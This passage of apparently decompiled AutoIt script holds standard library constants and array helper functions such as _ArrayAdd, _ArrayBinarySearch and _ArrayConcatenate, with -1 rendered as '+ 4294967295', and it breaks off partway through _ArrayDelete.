$IDC_HELP = 4 GLOBAL CONST $IDC_IBEAM = 5 GLOBAL CONST $IDC_ICON = 6 GLOBAL CONST $IDC_NO = 7 GLOBAL CONST $IDC_SIZE = 8 GLOBAL CONST $IDC_SIZEALL = 9 GLOBAL CONST $IDC_SIZENESW = 10 GLOBAL CONST $IDC_SIZENS = 11 GLOBAL CONST $IDC_SIZENWSE = 12 GLOBAL CONST $IDC_SIZEWE = 13 GLOBAL CONST $IDC_UPARROW = 14 GLOBAL CONST $IDC_WAIT = 15 GLOBAL CONST $IDI_APPLICATION = 32512 GLOBAL CONST $IDI_ASTERISK = 32516 GLOBAL CONST $IDI_EXCLAMATION = 32515 GLOBAL CONST $IDI_HAND = 32513 GLOBAL CONST $IDI_QUESTION = 32514 GLOBAL CONST $IDI_WINLOGO = 32517 GLOBAL CONST $IDI_SHIELD = 32518 GLOBAL CONST $IDI_ERROR = $IDI_HAND GLOBAL CONST $IDI_INFORMATION = $IDI_ASTERISK GLOBAL CONST $IDI_WARNING = $IDI_EXCLAMATION GLOBAL CONST $SD_LOGOFF = 0 GLOBAL CONST $SD_SHUTDOWN = 1 GLOBAL CONST $SD_REBOOT = 2 GLOBAL CONST $SD_FORCE = 4 GLOBAL CONST $SD_POWERDOWN = 8 GLOBAL CONST $SD_FORCEHUNG = 16 GLOBAL CONST $SD_STANDBY = 32 GLOBAL CONST $SD_HIBERNATE = 64 GLOBAL CONST $STDIN_CHILD = 1 GLOBAL CONST $STDOUT_CHILD = 2 GLOBAL CONST $STDERR_CHILD = 4 GLOBAL CONST $STDERR_MERGED = 8 GLOBAL CONST $STDIO_INHERIT_PARENT = 16 GLOBAL CONST $RUN_CREATE_NEW_CONSOLE = 65536 GLOBAL CONST $UBOUND_DIMENSIONS = 0 GLOBAL CONST $UBOUND_ROWS = 1 GLOBAL CONST $UBOUND_COLUMNS = 2 GLOBAL CONST $MOUSEEVENTF_ABSOLUTE = 32768 GLOBAL CONST $MOUSEEVENTF_MOVE = 1 GLOBAL CONST $MOUSEEVENTF_LEFTDOWN = 2 GLOBAL CONST $MOUSEEVENTF_LEFTUP = 4 GLOBAL CONST $MOUSEEVENTF_RIGHTDOWN = 8 GLOBAL CONST $MOUSEEVENTF_RIGHTUP = 16 GLOBAL CONST $MOUSEEVENTF_MIDDLEDOWN = 32 GLOBAL CONST $MOUSEEVENTF_MIDDLEUP = 64 GLOBAL CONST $MOUSEEVENTF_WHEEL = 2048 GLOBAL CONST $MOUSEEVENTF_XDOWN = 128 GLOBAL CONST $MOUSEEVENTF_XUP = 256 GLOBAL CONST $REG_NONE = 0 GLOBAL CONST $REG_SZ = 1 GLOBAL CONST $REG_EXPAND_SZ = 2 GLOBAL CONST $REG_BINARY = 3 GLOBAL CONST $REG_DWORD = 4 GLOBAL CONST $REG_DWORD_LITTLE_ENDIAN = 4 GLOBAL CONST $REG_DWORD_BIG_ENDIAN = 5 GLOBAL CONST $REG_LINK = 6 GLOBAL CONST $REG_MULTI_SZ = 7 GLOBAL CONST $REG_RESOURCE_LIST = 8 GLOBAL CONST $REG_FULL_RESOURCE_DESCRIPTOR = 9 GLOBAL CONST $REG_RESOURCE_REQUIREMENTS_LIST = 10 GLOBAL CONST $REG_QWORD = 11 GLOBAL CONST $REG_QWORD_LITTLE_ENDIAN = 11 GLOBAL CONST $HWND_BOTTOM = 1 GLOBAL CONST $HWND_NOTOPMOST = + 4294967294 GLOBAL CONST $HWND_TOP = 0 GLOBAL CONST $HWND_TOPMOST = + 4294967295 GLOBAL CONST $SWP_NOSIZE = 1 GLOBAL CONST $SWP_NOMOVE = 2 GLOBAL CONST $SWP_NOZORDER = 4 GLOBAL CONST $SWP_NOREDRAW = 8 GLOBAL CONST $SWP_NOACTIVATE = 16 GLOBAL CONST $SWP_FRAMECHANGED = 32 GLOBAL CONST $SWP_DRAWFRAME = 32 GLOBAL CONST $SWP_SHOWWINDOW = 64 GLOBAL CONST $SWP_HIDEWINDOW = 128 GLOBAL CONST $SWP_NOCOPYBITS = 256 GLOBAL CONST $SWP_NOOWNERZORDER = 512 GLOBAL CONST $SWP_NOREPOSITION = 512 GLOBAL CONST $SWP_NOSENDCHANGING = 1024 GLOBAL CONST $SWP_DEFERERASE = 8192 GLOBAL CONST $SWP_ASYNCWINDOWPOS = 16384 GLOBAL CONST $KEYWORD_DEFAULT = 1 GLOBAL CONST $KEYWORD_NULL = 2 GLOBAL CONST $DECLARED_LOCAL = + 4294967295 GLOBAL CONST $DECLARED_UNKNOWN = 0 GLOBAL CONST $DECLARED_GLOBAL = 1 GLOBAL CONST $ASSIGN_CREATE = 0 GLOBAL CONST $ASSIGN_FORCELOCAL = 1 GLOBAL CONST $ASSIGN_FORCEGLOBAL = 2 GLOBAL CONST $ASSIGN_EXISTFAIL = 4 GLOBAL CONST $BI_ENABLE = 0 GLOBAL CONST $BI_DISABLE = 1 GLOBAL CONST $BREAK_ENABLE = 1 GLOBAL CONST $BREAK_DISABLE = 0 GLOBAL CONST $CDTRAY_OPEN = "open" GLOBAL CONST $CDTRAY_CLOSED = "closed" GLOBAL CONST $SEND_DEFAULT = 0 GLOBAL CONST $SEND_RAW = 1 GLOBAL CONST $DIR_DEFAULT = 0 GLOBAL CONST $DIR_EXTENDED = 1 GLOBAL CONST $DIR_NORECURSE = 2 GLOBAL CONST $DIR_REMOVE = 1 GLOBAL CONST $DT_ALL = "ALL" GLOBAL CONST $DT_CDROM = "CDROM" GLOBAL CONST $DT_REMOVABLE = "REMOVABLE" GLOBAL CONST $DT_FIXED = "FIXED" GLOBAL CONST $DT_NETWORK = "NETWORK" GLOBAL CONST $DT_RAMDISK = "RAMDISK" GLOBAL CONST $DT_UNKNOWN = "UNKNOWN" GLOBAL CONST $DT_UNDEFINED = 1 GLOBAL CONST $DT_FAT = "FAT" GLOBAL CONST $DT_FAT32 = "FAT32" GLOBAL CONST $DT_EXFAT = "exFAT" GLOBAL CONST $DT_NTFS = "NTFS" GLOBAL CONST $DT_NWFS = "NWFS" GLOBAL CONST $DT_CDFS = "CDFS" GLOBAL CONST $DT_UDF = "UDF" GLOBAL CONST $DMA_DEFAULT = 0 GLOBAL CONST $DMA_PERSISTENT = 1 GLOBAL CONST $DMA_AUTHENTICATION = 8 GLOBAL CONST $DS_UNKNOWN = "UNKNOWN" GLOBAL CONST $DS_READY = "READY" GLOBAL CONST $DS_NOTREADY = "NOTREADY" GLOBAL CONST $DS_INVALID = "INVALID" GLOBAL CONST $MOUSE_CLICK_LEFT = "left" GLOBAL CONST $MOUSE_CLICK_RIGHT = "right" GLOBAL CONST $MOUSE_CLICK_MIDDLE = "middle" GLOBAL CONST $MOUSE_CLICK_MAIN = "main" GLOBAL CONST $MOUSE_CLICK_MENU = "menu" GLOBAL CONST $MOUSE_CLICK_PRIMARY = "primary" GLOBAL CONST $MOUSE_CLICK_SECONDARY = "secondary" GLOBAL CONST $MOUSE_WHEEL_UP = "up" GLOBAL CONST $MOUSE_WHEEL_DOWN = "down" GLOBAL CONST $NUMBER_AUTO = 0 GLOBAL CONST $NUMBER_32BIT = 1 GLOBAL CONST $NUMBER_64BIT = 2 GLOBAL CONST $NUMBER_DOUBLE = 3 GLOBAL CONST $OBJ_NAME = 1 GLOBAL CONST $OBJ_STRING = 2 GLOBAL CONST $OBJ_PROGID = 3 GLOBAL CONST $OBJ_FILE = 4 GLOBAL CONST $OBJ_MODULE = 5 GLOBAL CONST $OBJ_CLSID = 6 GLOBAL CONST $OBJ_IID = 7 GLOBAL CONST $EXITCLOSE_NORMAL = 0 GLOBAL CONST $EXITCLOSE_BYEXIT = 1 GLOBAL CONST $EXITCLOSE_BYCLICK = 2 GLOBAL CONST $EXITCLOSE_BYLOGOFF = 3 GLOBAL CONST $EXITCLOSE_BYSUTDOWN = 4 GLOBAL CONST $PROCESS_STATS_MEMORY = 0 GLOBAL CONST $PROCESS_STATS_IO = 1 GLOBAL CONST $PROCESS_LOW = 0 GLOBAL CONST $PROCESS_BELOWNORMAL = 1 GLOBAL CONST $PROCESS_NORMAL = 2 GLOBAL CONST $PROCESS_ABOVENORMAL = 3 GLOBAL CONST $PROCESS_HIGH = 4 GLOBAL CONST $PROCESS_REALTIME = 5 GLOBAL CONST $RUN_LOGON_NOPROFILE = 0 GLOBAL CONST $RUN_LOGON_PROFILE = 1 GLOBAL CONST $RUN_LOGON_NETWORK = 2 GLOBAL CONST $RUN_LOGON_INHERIT = 4 GLOBAL CONST $SOUND_NOWAIT = 0 GLOBAL CONST $SOUND_WAIT = 1 GLOBAL CONST $SHEX_OPEN = "open" GLOBAL CONST $SHEX_EDIT = "edit" GLOBAL CONST $SHEX_PRINT = "print" GLOBAL CONST $SHEX_PROPERTIES = "properties" GLOBAL CONST $TCP_DATA_DEFAULT = 0 GLOBAL CONST $TCP_DATA_BINARY = 1 GLOBAL CONST $UDP_OPEN_DEFAULT = 0 GLOBAL CONST $UDP_OPEN_BROADCAST = 1 GLOBAL CONST $UDP_DATA_DEFAULT = 0 GLOBAL CONST $UDP_DATA_BINARY = 1 GLOBAL CONST $UDP_DATA_ARRAY = 2 GLOBAL CONST $TIP_NOICON = 0 GLOBAL CONST $TIP_INFOICON = 1 GLOBAL CONST $TIP_WARNINGICON = 2 GLOBAL CONST $TIP_ERRORICON = 3 GLOBAL CONST $TIP_BALLOON = 1 GLOBAL CONST $TIP_CENTER = 2 GLOBAL CONST $TIP_FORCEVISIBLE = 4 GLOBAL CONST $WINDOWS_NOONTOP = 0 GLOBAL CONST $WINDOWS_ONTOP = 1 GLOBAL CONST $MB_OK = 0 GLOBAL CONST $MB_OKCANCEL = 1 GLOBAL CONST $MB_ABORTRETRYIGNORE = 2 GLOBAL CONST $MB_YESNOCANCEL = 3 GLOBAL CONST $MB_YESNO = 4 GLOBAL CONST $MB_RETRYCANCEL = 5 GLOBAL CONST $MB_CANCELTRYCONTINUE = 6 GLOBAL CONST $MB_HELP = 16384 GLOBAL CONST $MB_ICONSTOP = 16 GLOBAL CONST $MB_ICONERROR = 16 GLOBAL CONST $MB_ICONHAND = 16 GLOBAL CONST $MB_ICONQUESTION = 32 GLOBAL CONST $MB_ICONEXCLAMATION = 48 GLOBAL CONST $MB_ICONWARNING = 48 GLOBAL CONST $MB_ICONINFORMATION = 64 GLOBAL CONST $MB_ICONASTERISK = 64 GLOBAL CONST $MB_USERICON = 128 GLOBAL CONST $MB_DEFBUTTON1 = 0 GLOBAL CONST $MB_DEFBUTTON2 = 256 GLOBAL CONST $MB_DEFBUTTON3 = 512 GLOBAL CONST $MB_DEFBUTTON4 = 768 GLOBAL CONST $MB_APPLMODAL = 0 GLOBAL CONST $MB_SYSTEMMODAL = 4096 GLOBAL CONST $MB_TASKMODAL = 8192 GLOBAL CONST $MB_DEFAULT_DESKTOP_ONLY = 131072 GLOBAL CONST $MB_RIGHT = 524288 GLOBAL CONST $MB_RTLREADING = 1048576 GLOBAL CONST $MB_SETFOREGROUND = 65536 GLOBAL CONST $MB_TOPMOST = 262144 GLOBAL CONST $MB_SERVICE_NOTIFICATION = 2097152 GLOBAL CONST $MB_RIGHTJUSTIFIED = $MB_RIGHT GLOBAL CONST $IDTIMEOUT = + 4294967295 GLOBAL CONST $IDOK = 1 GLOBAL CONST $IDCANCEL = 2 GLOBAL CONST $IDABORT = 3 GLOBAL CONST $IDRETRY = 4 GLOBAL CONST $IDIGNORE = 5 GLOBAL CONST $IDYES = 6 GLOBAL CONST $IDNO = 7 GLOBAL CONST $IDCLOSE = 8 GLOBAL CONST $IDHELP = 9 GLOBAL CONST $IDTRYAGAIN = 10 GLOBAL CONST $IDCONTINUE = 11 GLOBAL CONST $STR_NOCASESENSE = 0 GLOBAL CONST $STR_CASESENSE = 1 GLOBAL CONST $STR_NOCASESENSEBASIC = 2 GLOBAL CONST $STR_STRIPLEADING = 1 GLOBAL CONST $STR_STRIPTRAILING = 2 GLOBAL CONST $STR_STRIPSPACES = 4 GLOBAL CONST $STR_STRIPALL = 8 GLOBAL CONST $STR_CHRSPLIT = 0 GLOBAL CONST $STR_ENTIRESPLIT = 1 GLOBAL CONST $STR_NOCOUNT = 2 GLOBAL CONST $STR_REGEXPMATCH = 0 GLOBAL CONST $STR_REGEXPARRAYMATCH = 1 GLOBAL CONST $STR_REGEXPARRAYFULLMATCH = 2 GLOBAL CONST $STR_REGEXPARRAYGLOBALMATCH = 3 GLOBAL CONST $STR_REGEXPARRAYGLOBALFULLMATCH = 4 GLOBAL CONST $STR_ENDISSTART = 0 GLOBAL CONST $STR_ENDNOTSTART = 1 GLOBAL CONST $SB_ANSI = 1 GLOBAL CONST $SB_UTF16LE = 2 GLOBAL CONST $SB_UTF16BE = 3 GLOBAL CONST $SB_UTF8 = 4 GLOBAL CONST $SE_UTF16 = 0 GLOBAL CONST $SE_ANSI = 1 GLOBAL CONST $SE_UTF8 = 2 GLOBAL CONST $STR_UTF16 = 0 GLOBAL CONST $STR_UCS2 = 1 GLOBAL ENUM $ARRAYFILL_FORCE_DEFAULT , $ARRAYFILL_FORCE_SINGLEITEM , $ARRAYFILL_FORCE_INT , $ARRAYFILL_FORCE_NUMBER , $ARRAYFILL_FORCE_PTR , $ARRAYFILL_FORCE_HWND , $ARRAYFILL_FORCE_STRING GLOBAL ENUM $ARRAYUNIQUE_NOCOUNT , $ARRAYUNIQUE_COUNT GLOBAL ENUM $ARRAYUNIQUE_AUTO , $ARRAYUNIQUE_FORCE32 , $ARRAYUNIQUE_FORCE64 , $ARRAYUNIQUE_MATCH , $ARRAYUNIQUE_DISTINCT FUNC _ARRAYADD (BYREF $AARRAY , $VVALUE , $ISTART = 0 , $SDELIM_ITEM = "|" , $SDELIM_ROW = @CRLF , $IFORCE = $ARRAYFILL_FORCE_DEFAULT ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF $SDELIM_ITEM = DEFAULT THEN $SDELIM_ITEM = "|" IF $SDELIM_ROW = DEFAULT THEN $SDELIM_ROW = @CRLF IF $IFORCE = DEFAULT THEN $IFORCE = $ARRAYFILL_FORCE_DEFAULT IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) LOCAL $HDATATYPE = 0 SWITCH $IFORCE CASE $ARRAYFILL_FORCE_INT $HDATATYPE = INT CASE $ARRAYFILL_FORCE_NUMBER $HDATATYPE = NUMBER CASE $ARRAYFILL_FORCE_PTR $HDATATYPE = PTR CASE $ARRAYFILL_FORCE_HWND $HDATATYPE = HWND CASE $ARRAYFILL_FORCE_STRING $HDATATYPE = STRING ENDSWITCH SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $IFORCE = $ARRAYFILL_FORCE_SINGLEITEM THEN REDIM $AARRAY [$IDIM_1 + 1 ] $AARRAY [$IDIM_1 ] = $VVALUE RETURN $IDIM_1 ENDIF IF ISARRAY ($VVALUE ) THEN IF UBOUND ($VVALUE , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) $HDATATYPE = 0 ELSE LOCAL $ATMP = STRINGSPLIT ($VVALUE , $SDELIM_ITEM , $STR_NOCOUNT + $STR_ENTIRESPLIT ) IF UBOUND ($ATMP , $UBOUND_ROWS ) = 1 THEN $ATMP [0 ] = $VVALUE ENDIF $VVALUE = $ATMP ENDIF LOCAL $IADD = UBOUND ($VVALUE , $UBOUND_ROWS ) REDIM $AARRAY [$IDIM_1 + $IADD ] FOR $I = 0 TO $IADD + 4294967295 IF ISFUNC ($HDATATYPE ) THEN $AARRAY [$IDIM_1 + $I ] = $HDATATYPE ($VVALUE [$I ] ) ELSE $AARRAY [$IDIM_1 + $I ] = $VVALUE [$I ] ENDIF NEXT RETURN $IDIM_1 + $IADD + 4294967295 CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $ISTART < 0 OR $ISTART > $IDIM_2 + 4294967295 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $IVALDIM_1 , $IVALDIM_2 = 0 , $ICOLCOUNT IF ISARRAY ($VVALUE ) THEN IF UBOUND ($VVALUE , $UBOUND_DIMENSIONS ) <> 2 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) $IVALDIM_1 = UBOUND ($VVALUE , $UBOUND_ROWS ) $IVALDIM_2 = UBOUND ($VVALUE , $UBOUND_COLUMNS ) $HDATATYPE = 0 ELSE LOCAL $ASPLIT_1 = STRINGSPLIT ($VVALUE , $SDELIM_ROW , $STR_NOCOUNT + $STR_ENTIRESPLIT ) $IVALDIM_1 = UBOUND ($ASPLIT_1 , $UBOUND_ROWS ) LOCAL $ATMP [$IVALDIM_1 ] [0 ] , $ASPLIT_2 FOR $I = 0 TO $IVALDIM_1 + 4294967295 $ASPLIT_2 = STRINGSPLIT ($ASPLIT_1 [$I ] , $SDELIM_ITEM , $STR_NOCOUNT + $STR_ENTIRESPLIT ) $ICOLCOUNT = UBOUND ($ASPLIT_2 ) IF $ICOLCOUNT > $IVALDIM_2 THEN $IVALDIM_2 = $ICOLCOUNT REDIM $ATMP [$IVALDIM_1 ] [$IVALDIM_2 ] ENDIF FOR $J = 0 TO $ICOLCOUNT + 4294967295 $ATMP [$I ] [$J ] = $ASPLIT_2 [$J ] NEXT NEXT $VVALUE = $ATMP ENDIF IF UBOUND ($VVALUE , $UBOUND_COLUMNS ) + $ISTART > UBOUND ($AARRAY , $UBOUND_COLUMNS ) THEN RETURN SETERROR (3 , 0 , + 4294967295 ) REDIM $AARRAY [$IDIM_1 + $IVALDIM_1 ] [$IDIM_2 ] FOR $IWRITETO_INDEX = 0 TO $IVALDIM_1 + 4294967295 FOR $J = 0 TO $IDIM_2 + 4294967295 IF $J < $ISTART THEN $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = "" ELSEIF $J - $ISTART > $IVALDIM_2 + 4294967295 THEN $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = "" ELSE IF ISFUNC ($HDATATYPE ) THEN $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = $HDATATYPE ($VVALUE [$IWRITETO_INDEX ] [$J - $ISTART ] ) ELSE $AARRAY [$IWRITETO_INDEX + $IDIM_1 ] [$J ] = $VVALUE [$IWRITETO_INDEX ] [$J - $ISTART ] ENDIF ENDIF NEXT NEXT CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 ENDFUNC FUNC _ARRAYBINARYSEARCH (CONST BYREF $AARRAY , $VVALUE , $ISTART = 0 , $IEND = 0 , $ICOLUMN = 0 ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF $IEND = DEFAULT THEN $IEND = 0 IF $ICOLUMN = DEFAULT THEN $ICOLUMN = 0 IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) IF $IDIM_1 = 0 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) IF $IEND < 1 OR $IEND > $IDIM_1 + 4294967295 THEN $IEND = $IDIM_1 + 4294967295 IF $ISTART < 0 THEN $ISTART = 0 IF $ISTART > $IEND THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $IMID = INT (($IEND + $ISTART ) / 2 ) SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 IF $AARRAY [$ISTART ] > $VVALUE OR $AARRAY [$IEND ] < $VVALUE THEN RETURN SETERROR (2 , 0 , + 4294967295 ) WHILE $ISTART <= $IMID AND $VVALUE <> $AARRAY [$IMID ] IF $VVALUE < $AARRAY [$IMID ] THEN $IEND = $IMID + 4294967295 ELSE $ISTART = $IMID + 1 ENDIF $IMID = INT (($IEND + $ISTART ) / 2 ) WEND IF $ISTART > $IEND THEN RETURN SETERROR (3 , 0 , + 4294967295 ) CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) + 4294967295 IF $ICOLUMN < 0 OR $ICOLUMN > $IDIM_2 THEN RETURN SETERROR (7 , 0 , + 4294967295 ) IF $AARRAY [$ISTART ] [$ICOLUMN ] > $VVALUE OR $AARRAY [$IEND ] [$ICOLUMN ] < $VVALUE THEN RETURN SETERROR (2 , 0 , + 4294967295 ) WHILE $ISTART <= $IMID AND $VVALUE <> $AARRAY [$IMID ] [$ICOLUMN ] IF $VVALUE < $AARRAY [$IMID ] [$ICOLUMN ] THEN $IEND = $IMID + 4294967295 ELSE $ISTART = $IMID + 1 ENDIF $IMID = INT (($IEND + $ISTART ) / 2 ) WEND IF $ISTART > $IEND THEN RETURN SETERROR (3 , 0 , + 4294967295 ) CASE ELSE RETURN SETERROR (5 , 0 , + 4294967295 ) ENDSWITCH RETURN $IMID ENDFUNC FUNC _ARRAYCOLDELETE (BYREF $AARRAY , $ICOLUMN , $BCONVERT = FALSE ) IF $BCONVERT = DEFAULT THEN $BCONVERT = FALSE IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 2 THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) SWITCH $IDIM_2 CASE 2 IF $ICOLUMN < 0 OR $ICOLUMN > 1 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) IF $BCONVERT THEN LOCAL $ATEMPARRAY [$IDIM_1 ] FOR $I = 0 TO $IDIM_1 + 4294967295 $ATEMPARRAY [$I ] = $AARRAY [$I ] [(NOT $ICOLUMN ) ] NEXT $AARRAY = $ATEMPARRAY ELSE CONTINUECASE ENDIF CASE ELSE IF $ICOLUMN < 0 OR $ICOLUMN > $IDIM_2 + 4294967295 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = $ICOLUMN TO $IDIM_2 + 4294967294 $AARRAY [$I ] [$J ] = $AARRAY [$I ] [$J + 1 ] NEXT NEXT REDIM $AARRAY [$IDIM_1 ] [$IDIM_2 + 4294967295 ] ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_COLUMNS ) ENDFUNC FUNC _ARRAYCOLINSERT (BYREF $AARRAY , $ICOLUMN ) IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 LOCAL $ATEMPARRAY [$IDIM_1 ] [2 ] SWITCH $ICOLUMN CASE 0 , 1 FOR $I = 0 TO $IDIM_1 + 4294967295 $ATEMPARRAY [$I ] [(NOT $ICOLUMN ) ] = $AARRAY [$I ] NEXT CASE ELSE RETURN SETERROR (3 , 0 , + 4294967295 ) ENDSWITCH $AARRAY = $ATEMPARRAY CASE 2 LOCAL $IDIM_2 = UBOUND ($AARRAY , $UBOUND_COLUMNS ) IF $ICOLUMN < 0 OR $ICOLUMN > $IDIM_2 THEN RETURN SETERROR (3 , 0 , + 4294967295 ) REDIM $AARRAY [$IDIM_1 ] [$IDIM_2 + 1 ] FOR $I = 0 TO $IDIM_1 + 4294967295 FOR $J = $IDIM_2 TO $ICOLUMN + 1 STEP + 4294967295 $AARRAY [$I ] [$J ] = $AARRAY [$I ] [$J + 4294967295 ] NEXT $AARRAY [$I ] [$ICOLUMN ] = "" NEXT CASE ELSE RETURN SETERROR (2 , 0 , + 4294967295 ) ENDSWITCH RETURN UBOUND ($AARRAY , $UBOUND_COLUMNS ) ENDFUNC FUNC _ARRAYCOMBINATIONS (CONST BYREF $AARRAY , $ISET , $SDELIMITER = "" ) IF $SDELIMITER = DEFAULT THEN $SDELIMITER = "" IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , 0 ) IF UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) <> 1 THEN RETURN SETERROR (2 , 0 , 0 ) LOCAL $IN = UBOUND ($AARRAY ) LOCAL $IR = $ISET LOCAL $AIDX [$IR ] FOR $I = 0 TO $IR + 4294967295 $AIDX [$I ] = $I NEXT LOCAL $ITOTAL = __ARRAY_COMBINATIONS ($IN , $IR ) LOCAL $ILEFT = $ITOTAL LOCAL $ARESULT [$ITOTAL + 1 ] $ARESULT [0 ] = $ITOTAL LOCAL $ICOUNT = 1 WHILE $ILEFT > 0 __ARRAY_GETNEXT ($IN , $IR , $ILEFT , $ITOTAL , $AIDX ) FOR $I = 0 TO $ISET + 4294967295 $ARESULT [$ICOUNT ] &= $AARRAY [$AIDX [$I ] ] & $SDELIMITER NEXT IF $SDELIMITER <> "" THEN $ARESULT [$ICOUNT ] = STRINGTRIMRIGHT ($ARESULT [$ICOUNT ] , 1 ) $ICOUNT += 1 WEND RETURN $ARESULT ENDFUNC FUNC _ARRAYCONCATENATE (BYREF $AARRAYTARGET , CONST BYREF $AARRAYSOURCE , $ISTART = 0 ) IF $ISTART = DEFAULT THEN $ISTART = 0 IF NOT ISARRAY ($AARRAYTARGET ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) IF NOT ISARRAY ($AARRAYSOURCE ) THEN RETURN SETERROR (2 , 0 , + 4294967295 ) LOCAL $IDIM_TOTAL_TGT = UBOUND ($AARRAYTARGET , $UBOUND_DIMENSIONS ) LOCAL $IDIM_TOTAL_SRC = UBOUND ($AARRAYSOURCE , $UBOUND_DIMENSIONS ) LOCAL $IDIM_1_TGT = UBOUND ($AARRAYTARGET , $UBOUND_ROWS ) LOCAL $IDIM_1_SRC = UBOUND ($AARRAYSOURCE , $UBOUND_ROWS ) IF $ISTART < 0 OR $ISTART > $IDIM_1_SRC + 4294967295 THEN RETURN SETERROR (6 , 0 , + 4294967295 ) SWITCH $IDIM_TOTAL_TGT CASE 1 IF $IDIM_TOTAL_SRC <> 1 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) REDIM $AARRAYTARGET [$IDIM_1_TGT + $IDIM_1_SRC - $ISTART ] FOR $I = $ISTART TO $IDIM_1_SRC + 4294967295 $AARRAYTARGET [$IDIM_1_TGT + $I - $ISTART ] = $AARRAYSOURCE [$I ] NEXT CASE 2 IF $IDIM_TOTAL_SRC <> 2 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) LOCAL $IDIM_2_TGT = UBOUND ($AARRAYTARGET , $UBOUND_COLUMNS ) IF UBOUND ($AARRAYSOURCE , $UBOUND_COLUMNS ) <> $IDIM_2_TGT THEN RETURN SETERROR (5 , 0 , + 4294967295 ) REDIM $AARRAYTARGET [$IDIM_1_TGT + $IDIM_1_SRC - $ISTART ] [$IDIM_2_TGT ] FOR $I = $ISTART TO $IDIM_1_SRC + 4294967295 FOR $J = 0 TO $IDIM_2_TGT + 4294967295 $AARRAYTARGET [$IDIM_1_TGT + $I - $ISTART ] [$J ] = $AARRAYSOURCE [$I ] [$J ] NEXT NEXT CASE ELSE RETURN SETERROR (3 , 0 , + 4294967295 ) ENDSWITCH RETURN UBOUND ($AARRAYTARGET , $UBOUND_ROWS ) ENDFUNC FUNC _ARRAYDELETE (BYREF $AARRAY , $VRANGE ) IF NOT ISARRAY ($AARRAY ) THEN RETURN SETERROR (1 , 0 , + 4294967295 ) LOCAL $IDIM_1 = UBOUND ($AARRAY , $UBOUND_ROWS ) + 4294967295 IF ISARRAY ($VRANGE ) THEN IF UBOUND ($VRANGE , $UBOUND_DIMENSIONS ) <> 1 OR UBOUND ($VRANGE , $UBOUND_ROWS ) < 2 THEN RETURN SETERROR (4 , 0 , + 4294967295 ) ELSE LOCAL $INUMBER , $ASPLIT_1 , $ASPLIT_2 $VRANGE = STRINGSTRIPWS ($VRANGE , 8 ) $ASPLIT_1 = STRINGSPLIT ($VRANGE , ";" ) $VRANGE = "" FOR $I = 1 TO $ASPLIT_1 [0 ] IF NOT STRINGREGEXP ($ASPLIT_1 [$I ] , "^\d+(-\d+)?$" ) THEN RETURN SETERROR (3 , 0 , + 4294967295 ) $ASPLIT_2 = STRINGSPLIT ($ASPLIT_1 [$I ] , "-" ) SWITCH $ASPLIT_2 [0 ] CASE 1 $VRANGE &= $ASPLIT_2 [1 ] & ";" CASE 2 IF NUMBER ($ASPLIT_2 [2 ] ) >= NUMBER ($ASPLIT_2 [1 ] ) THEN $INUMBER = $ASPLIT_2 [1 ] + 4294967295 DO $INUMBER += 1 $VRANGE &= $INUMBER & ";" UNTIL $INUMBER = $ASPLIT_2 [2 ] ENDIF ENDSWITCH NEXT $VRANGE = STRINGSPLIT (STRINGTRIMRIGHT ($VRANGE , 1 ) , ";" ) ENDIF IF $VRANGE [1 ] < 0 OR $VRANGE [$VRANGE [0 ] ] > $IDIM_1 THEN RETURN SETERROR (5 , 0 , + 4294967295 ) LOCAL $ICOPYTO_INDEX = 0 SWITCH UBOUND ($AARRAY , $UBOUND_DIMENSIONS ) CASE 1 FOR $I = 1 TO $VRANGE [0 ] $AARRAY [$VRANGE [$I ] ] = CHRW (64177 ) NEXT FOR $IREADFROM_INDEX = 0 TO $IDIM_1 IF $AARRAY [$IREADFROM_INDEX ] == CHRW (64177 ) THEN CONTINUELOOP ELSE IF $IREADFROM_INDEX <> $ICOPYTO_INDEX THEN $AARRAY [$ICOPYTO_INDEX ] = $AARRAY [$IREADFROM_INDEX ] ENDIF $ICOPYTO_INDEX += 1 ENDIF NEXT REDIM $AARRAY [$IDIM_1 - $VRANGE [0 ] + 1 ] CASE 2 